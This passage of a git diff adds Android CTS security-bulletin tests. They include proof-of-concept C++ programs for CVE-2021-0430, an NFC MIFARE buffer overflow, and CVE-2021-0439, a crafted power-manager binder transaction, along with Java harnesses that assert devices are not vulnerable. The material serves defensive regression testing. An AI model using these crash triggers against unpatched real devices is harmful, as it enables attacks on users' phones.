Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2021-0430", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/include", + "system/nfc/src/gki/common", + "system/nfc/src/nfc/include", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} + diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp new file mode 100644 index 00000000000..947f46a2007 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp @@ -0,0 +1,87 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_int.h> +#include <rw_int.h> + +#define RW_MFC_STATE_READ_NDEF 0x03 +#define RW_MFC_SUBSTATE_READ_BLOCK 0x03 + +extern tRW_CB rw_cb; + +void GKI_freebuf(void*) { +} + +void GKI_start_timer(uint8_t, int32_t, bool) { +} + +void GKI_stop_timer(uint8_t) { +} + +void cback(tRW_EVENT, tRW_DATA*) { +} + +int main() { + tRW_MFC_CB* p_mfc = &rw_cb.tcb.mfc; + + GKI_init(); + rw_init(); + + uint8_t selres = 1; + uint8_t uid[MFC_UID_LEN] = { 1 }; + if (rw_mfc_select(selres, uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + p_mfc->state = RW_MFC_STATE_READ_NDEF; + p_mfc->substate = RW_MFC_SUBSTATE_READ_BLOCK; + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + + tNFC_CONN* p_data = (tNFC_CONN*) malloc(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR*) malloc(sizeof(uint8_t) * 16); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + p_data->data.status = NFC_STATUS_OK; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + NFC_HDR* mfc_data = (NFC_HDR*) p_data->data.p_data; + mfc_data->len = 0x10; + mfc_data->offset = 0; + p_mfc->ndef_length = 1024; + p_mfc->p_ndef_buffer = (uint8_t*) malloc(sizeof(uint8_t) * 16); + if (!(p_mfc->p_ndef_buffer)) { + free(p_data->data.p_data); + free(p_data); + return EXIT_FAILURE; + } + + rw_cb.p_cback = cback; + + p_cb->p_cback(0, event, p_data); + + free(p_mfc->p_ndef_buffer); + free(p_data->data.p_data); + free(p_data); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp new file mode 100644 index 00000000000..5cfd2f5c0bc --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp @@ -0,0 +1,31 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2021-0439", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp" + ], + shared_libs : [ + "libutils", + "libbinder", + ], + cflags: [ + "-DDO_NOT_CHECK_MANUAL_BINDER_INTERFACES", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp new file mode 100644 index 00000000000..65cab130f75 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp @@ -0,0 +1,49 @@ +/* + * Copyright 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <binder/IServiceManager.h> +#include <binder/Parcel.h> + +using namespace android; + +int main() { + sp<IServiceManager> sm = defaultServiceManager(); + sp<IBinder> binder = sm->getService(String16("power")); + if (!binder) { + return EXIT_FAILURE; + } + Parcel data, result; + data.writeInterfaceToken(String16("android.os.IPowerManager")); + char d[] = {static_cast<char>(0xc9), + static_cast<char>(0xa4), + 0x10, + static_cast<char>(0xd4), + 0x00, + 0x00, + 0x00, + 0x00, + 0x00, + 0x27, + 0x00, + 0x5a, + 0x00, + 0x00, + 0x00, + 0x00}; + data.write(d, sizeof(d)); + binder->transact(6, data, &result); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java index a028330f3de..cf48079bef1 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java @@ -23,6 +23,7 @@ import com.android.compatibility.common.util.ResultUnit; import com.android.ddmlib.IShellOutputReceiver; import com.android.ddmlib.NullOutputReceiver; import com.android.ddmlib.CollectingOutputReceiver; +import com.android.tradefed.device.DeviceNotAvailableException; import com.android.tradefed.device.ITestDevice; import com.android.tradefed.device.NativeDevice; import com.android.tradefed.log.LogUtil.CLog; @@ -34,6 +35,7 @@ import java.io.InputStream; import java.io.OutputStream; import java.util.concurrent.TimeoutException; import java.util.List; +import java.util.Map; import java.util.regex.Pattern; import java.util.concurrent.TimeUnit; import java.util.Scanner; @@ -48,8 +50,9 @@ import org.json.JSONObject; import java.util.regex.Pattern; import java.lang.Thread; + import static org.junit.Assert.*; -import junit.framework.Assert; +import static org.junit.Assume.*; public class AdbUtils { @@ -60,6 +63,7 @@ public class AdbUtils { public static class pocConfig { String binaryName; String arguments; + Map<String, String> envVars; String inputFilesDestination; ITestDevice device; CrashUtils.Config config; @@ -162,8 +166,25 @@ public class AdbUtils { */ public static int runPoc(String pocName, ITestDevice device, int timeout, String arguments, IShellOutputReceiver receiver) throws Exception { + return runPoc(pocName, device, timeout, arguments, null, receiver); + } + + /** + * Pushes and runs a binary with arguments to the selected device and + * ignores any of its output. + * + * @param pocName name of the poc binary + * @param device device to be ran on + * @param timeout time to wait for output in seconds + * @param arguments input arguments for the poc + * @param envVars run the poc with environment variables + * @param receiver the type of receiver to run against + */ + public static int runPoc(String pocName, ITestDevice device, int timeout, + String arguments, Map<String, String> envVars, + IShellOutputReceiver receiver) throws Exception { String remoteFile = String.format("%s%s", TMP_PATH, pocName); - SecurityTestCase.getPocPusher(device).pushFile(pocName, remoteFile); + SecurityTestCase.getPocPusher(device).pushFile(pocName + "_sts", remoteFile); assertPocExecutable(pocName, device); if (receiver == null) { @@ -173,11 +194,26 @@ public class AdbUtils { arguments = ""; } + String env = ""; + if (envVars != null) { + StringBuilder sb = new StringBuilder(); + for (Map.Entry<String, String> entry : envVars.entrySet()) { + sb + .append(entry.getKey().trim()) + .append('=') + .append(entry.getValue().trim()) + .append(' '); + } + env = sb.toString(); + CLog.i("Running poc '%s' with env variables '%s'", pocName, env); + } + // since we have to return the exit status AND the poc stdout+stderr we redirect the exit // status to a file temporarily String exitStatusFilepath = TMP_PATH + "exit_status"; runCommandLine("rm " + exitStatusFilepath, device); // remove any old exit status - device.executeShellCommand(TMP_PATH + pocName + " " + arguments + + device.executeShellCommand( + env + TMP_PATH + pocName + " " + arguments + "; echo $? > " + exitStatusFilepath, // echo exit status to file receiver, timeout, TimeUnit.SECONDS, 0); @@ -411,7 +447,21 @@ public class AdbUtils { */ public static int runPocGetExitStatus(String pocName, String arguments, ITestDevice device, int timeout) throws Exception { - return runPoc(pocName, device, timeout, arguments, null); + return runPocGetExitStatus(pocName, arguments, null, device, timeout); + } + + /** + * Pushes and runs a binary to the device and returns the exit status. + * @param pocName name of the poc binary + * @param arguments input arguments for the poc + * @param envVars run the poc with environment variables + * @param device device to be run on + * @param timeout time to wait for output in seconds + */ + public static int runPocGetExitStatus( + String pocName, String arguments, Map<String, String> envVars, + ITestDevice device, int timeout) throws Exception { + return runPoc(pocName, device, timeout, arguments, envVars, null); } /** @@ -434,8 +484,22 @@ public class AdbUtils { */ public static void runPocAssertExitStatusNotVulnerable(String pocName, String arguments, ITestDevice device, int timeout) throws Exception { + runPocGetExitStatus(pocName, arguments, null, device, timeout); + } + + /** + * Pushes and runs a binary and asserts that the exit status isn't 113: vulnerable. + * @param pocName name of the poc binary + * @param arguments input arguments for the poc + * @param envVars run the poc with environment variables + * @param device device to be ran on + * @param timeout time to wait for output in seconds + */ + public static void runPocAssertExitStatusNotVulnerable( + String pocName, String arguments, Map<String, String> envVars, + ITestDevice device, int timeout) throws Exception { assertTrue("PoC returned exit status 113: vulnerable", - runPocGetExitStatus(pocName, arguments, device, timeout) != 113); + runPocGetExitStatus(pocName, arguments, envVars, device, timeout) != 113); } /** @@ -579,8 +643,33 @@ public class AdbUtils { public static void runPocAssertNoCrashesNotVulnerable(String binaryName, String arguments, String inputFiles[], String inputFilesDestination, ITestDevice device, String processPatternStrings[]) throws Exception { + runPocAssertNoCrashesNotVulnerable(binaryName, arguments, null, + inputFiles, inputFilesDestination, device, processPatternStrings); + } + + /** + * Runs the poc binary and asserts following 3 conditions. + * 1. There are no security crashes in the binary. + * 2. There are no security crashes that match the expected process pattern. + * 3. The exit status isn't 113 (Code 113 is used to indicate the vulnerability condition). + * + * @param binaryName name of the binary + * @param arguments arguments for running the binary + * @param envVars run the poc with environment variables + * @param inputFiles files required as input + * @param inputFilesDestination destination directory to which input files are + * pushed + * @param device device to be run on + * @param processPatternStrings a Pattern string (other than binary name) to match the crash + * tombstone process + */ + public static void runPocAssertNoCrashesNotVulnerable( + String binaryName, String arguments, Map<String, String> envVars, + String inputFiles[], String inputFilesDestination, ITestDevice device, + String... processPatternStrings) throws Exception { pocConfig testConfig = new pocConfig(binaryName, device); testConfig.arguments = arguments; + testConfig.envVars = envVars; if (inputFiles != null) { testConfig.inputFiles = Arrays.asList(inputFiles); @@ -617,7 +706,7 @@ public class AdbUtils { runCommandLine("logcat -c", testConfig.device); try { runPocAssertExitStatusNotVulnerable(testConfig.binaryName, testConfig.arguments, - testConfig.device, TIMEOUT_SEC); + testConfig.envVars, testConfig.device, TIMEOUT_SEC); } catch (IllegalArgumentException e) { /* * Since 'runPocGetExitStatus' method raises IllegalArgumentException upon @@ -686,5 +775,9 @@ public class AdbUtils { } catch (JSONException e) {} } fail(error.toString()); - } + } + + public static void assumeHasNfc(ITestDevice device) throws DeviceNotAvailableException { + assumeTrue("nfc not available on device", device.hasFeature("android.hardware.nfc")); + } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java new file mode 100644 index 00000000000..e6e10156a09 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.compatibility.common.util.CrashUtils; +import static org.junit.Assume.assumeFalse; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2016_2182 extends SecurityTestCase { + + /** + * b/32096880 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2017-03") + @Test + public void testPocCVE_2016_2182() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.conscrypt")); + String binaryName = "CVE-2016-2182"; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.checkMinAddress(false); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java new file mode 100644 index 00000000000..9d032cd77ef --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java @@ -0,0 +1,36 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2016_8332 extends SecurityTestCase { + + /** + * b/37761553 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2017-06") + @Test + public void testPocCVE_2016_8332() throws Exception { + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2016-8332", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java new file mode 100644 index 00000000000..ab83ce38c9f --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +import static org.junit.Assert.*; +import static org.junit.Assume.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2017_13194 extends SecurityTestCase { + + /** + * b/64710201 + * Vulnerability Behaviour: SIGSEGV in media.codec + */ + @SecurityTest(minPatchLevel = "2018-01") + @Test + public void testPocCVE_2017_13194() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media.swcodec")); + pocPusher.only64(); + String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-13194", null, getDevice(), + processPatternStrings); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java new file mode 100644 index 00000000000..6f1c03f9b60 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java @@ -0,0 +1,45 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2018_9558 extends SecurityTestCase { + + /** + * b/112161557 + * Vulnerability Behaviour: SIGABRT in self + */ + @SecurityTest(minPatchLevel = "2018-12") + @Test + public void testPocCVE_2018_9558() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + String binaryName = "CVE-2018-9558"; + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.setSignals(signals); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java new file mode 100644 index 00000000000..ad88bb77eb1 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2018_9561 extends SecurityTestCase { + + /** + * b/111660010 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2018_9561() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9561", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java new file mode 100644 index 00000000000..8f8b53de0d3 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2018_9563 extends SecurityTestCase { + + /** + * b/114237888 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2018_9563() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9563", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java new file mode 100644 index 00000000000..5d68ce6305e --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java @@ -0,0 +1,39 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2018_9584 extends SecurityTestCase { + + /** + * b/114047681 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-01") + @Test + public void testPocCVE_2018_9584() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9584", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java new file mode 100644 index 00000000000..f5d19e4cc3a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java @@ -0,0 +1,39 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2018_9585 extends SecurityTestCase { + + /** + * b/117554809 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-01") + @Test + public void testPocCVE_2018_9585() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9585", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java new file mode 100644 index 00000000000..718878cc79c --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java @@ -0,0 +1,36 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2007 extends SecurityTestCase { + + /** + * b/120789744 + * Vulnerability Behaviour: EXIT_VULNERABLE (113) + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2019_2007() throws Exception { + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2007", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java new file mode 100644 index 00000000000..d2f60c79f9a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2013 extends SecurityTestCase { + + /** + * b/120497583 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2019_2013() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2013", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java new file mode 100644 index 00000000000..c70f560cfbe --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java @@ -0,0 +1,43 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2014 extends SecurityTestCase { + + /** + * b/120499324 + * Vulnerability Behaviour: SIGABRT in self + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2019_2014() throws Exception { + pocPusher.only64(); + String binaryName = "CVE-2019-2014"; + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.setSignals(signals); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java new file mode 100644 index 00000000000..cd61170fc6a --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2019 extends SecurityTestCase { + + /** + * b/115635871 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2019_2019() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2019", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java new file mode 100644 